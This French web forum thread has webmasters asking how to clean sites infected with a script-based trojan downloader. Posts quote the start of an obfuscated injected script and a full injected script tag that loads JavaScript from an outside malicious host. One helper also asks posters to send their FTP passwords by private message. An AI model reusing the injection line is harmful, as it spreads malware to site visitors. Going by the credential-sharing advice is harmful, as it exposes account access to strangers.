IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Mon site est infecté


Sujet :

Sécurité

  1. #1
    Membre du Club
    Profil pro
    Développeur Web
    Inscrit en
    Novembre 2007
    Messages
    65
    Détails du profil
    Informations personnelles :
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Développeur Web

    Informations forums :
    Inscription : Novembre 2007
    Messages : 65
    Points : 53
    Points
    53
    Par défaut Mon site est infecté
    Kaspersky à détecté HEUR:Trojan-Downloader.Script.Generic sur mon site. J'ai vérifier le code de la page index et j'ai trouvé un code commençant par ceci :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script>/*LGPL*/ try{ window.onload = function(){Fi7iiv2h7otw = ...
    J'ai supprimer tous les fichiers et j'ai reuploader de nouveaux fichiers et toujours le même problème.

    Avez vous une idée comment je peut désinfecter les fichiers dans mon compte FTP ?

    Merci

  2. #2
    Invité
    Invité(e)
    Par défaut
    Citation Envoyé par riadh8 Voir le message
    J'ai supprimer tous les fichiers et j'ai reuploader de nouveaux fichiers et toujours le même problème.
    Merci
    Bonjour,
    Nous avons toujours autant de mal a résoudre ces intrusions , pourtant c'est enfantin a résoudre (enfin presque)

    En effet pour résoudre ton probléme, il suffit de trouver ou est le code "réel"
    qui te mets ce code partout,
    Souvent, il sagit de la feuille de style ou une image.
    Il suffirait que tu nous donnes par MP (puis le fasse changer aprés)
    ton accés FTP. Voila pourquoi Nous avons toujours autant de mal

    En dehor de cela tu peux chercher tout seul alors j'essais de t'aider.

    Les trois cas ...
    1) le serveur a un énorme trou ! (ça si tu es hébergé par un connu c' est NON)

    2) ton FTP as été pris ou trouvé et un malin a placé un fichier
    REPONSE fait vite changer le MDP de FTP et recharges tout

    3) C 'est toi même qui a créé la faille
    Un GET ou POST mal protégé ou des données dans Mysql vérolées.
    Un répertoire en CHGMOD supérieur a 755
    Un fichier en CHGMOD supérieur a 644

    Donc si tu ne trouves pas mon MP t'est ouvert

    PS: mets moi au moins par MP ton URL
    Dernière modification par Invité ; 22/01/2010 à 16h54.

  3. #3
    Nouveau Candidat au Club
    Inscrit en
    Mai 2010
    Messages
    1
    Détails du profil
    Informations forums :
    Inscription : Mai 2010
    Messages : 1
    Points : 1
    Points
    1
    Par défaut Sécurité internet : comment désinfecter un site web du virus (HEUR:Trojan-Downloader.Script.Generic)

  4. #4
    Expert confirmé
    Avatar de laurentSc
    Homme Profil pro
    Webmaster débutant perpétuel !
    Inscrit en
    Octobre 2006
    Messages
    10 385
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 60
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Webmaster débutant perpétuel !
    Secteur : Industrie

    Informations forums :
    Inscription : Octobre 2006
    Messages : 10 385
    Points : 5 733
    Points
    5 733
    Billets dans le blog
    1
    Par défaut
    J'ai un problème similaire : mon PC était infecté, et le temps que je m'en aperçoive, j'ai infecté 2 sites. Le virus rajoutait dans certains fichiers source des lignes du type :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
      <script type="text/javascript"
     src="http://dolfy.sedonahyperbarics.com:8080/Webcam.js"></script><!--1d8227be2fdc9ff9141587d0849387fa-->
    . Je les ai enlevées, mais le virus est encore détecté (par ça). Comment faire pour désinfecter ces sites ?
    Il vaut mieux viser la perfection et la manquer que viser l'imperfection et l'atteindre. - Bertrand Russell

    Si la discussion est résolue, merci de cliquer sur le bouton

  5. #5
    Expert confirmé
    Avatar de laurentSc
    Homme Profil pro
    Webmaster débutant perpétuel !
    Inscrit en
    Octobre 2006
    Messages
    10 385
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 60
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Activité : Webmaster débutant perpétuel !
    Secteur : Industrie

    Informations forums :
    Inscription : Octobre 2006
    Messages : 10 385
    Points : 5 733
    Points
    5 733
    Billets dans le blog
    1
    Par défaut
    Salut Mauriser, vu ce que tu as écrit plus haut, je m'apprêtais à te donner par MP les coordonnées FTP du compte du site dont je suis webmaster (pas du 2e, car même si j'ai fait pas mal de trucs dessus, je ne suis pas le webmaster, donc je me serais contenté de tes conseils), mais ça m'a répondu que je ne pouvais pas t'envoyer de MP...
    Il vaut mieux viser la perfection et la manquer que viser l'imperfection et l'atteindre. - Bertrand Russell

    Si la discussion est résolue, merci de cliquer sur le bouton

  6. #6
    Invité
    Invité(e)
    Par défaut
    Je crois que j'ais decoché la case pour les MP
    testes, si non dans une heure je te mets un MP

    Donc REEDITES pour infos pour les lecteurs

    Tu avais écris

    Je les ai enlevées, mais le virus est encore détecté (par ça). Comment faire pour désinfecter ces sites ?
    En fait c'est bien lui le coupable mais tu as vu qu'il restait dans 69 index.xxx
    et dans deux vicieux javascripts ... en plus dont un sur le second site qui est hors du chemin atteignable par le FTP !!

    Bref quand il y a propagation, il faut tout remplacer d'un coup !
    Et le danger par le jeux du FTP c'est d'avoir sois même récupéré des
    fichiers contenant ces TROJAN !

    Bref cette fois tu es sur la bonne voie !
    Dernière modification par Invité ; 03/07/2010 à 20h21.

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Mon ordinateur est infecté par Trojan
    Par Sydjey dans le forum Sécurité
    Réponses: 4
    Dernier message: 08/04/2007, 23h09
  2. Réponses: 36
    Dernier message: 26/03/2007, 20h00
  3. Mon registre est infecté que faire ?
    Par fred59 dans le forum Ordinateurs
    Réponses: 5
    Dernier message: 13/03/2007, 22h49
  4. Mon PC est infecté
    Par mouloudéen dans le forum Sécurité
    Réponses: 4
    Dernier message: 15/10/2006, 16h04
  5. [HTML] Mon site est invisible oO
    Par florent dans le forum Balisage (X)HTML et validation W3C
    Réponses: 5
    Dernier message: 18/02/2006, 17h06

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo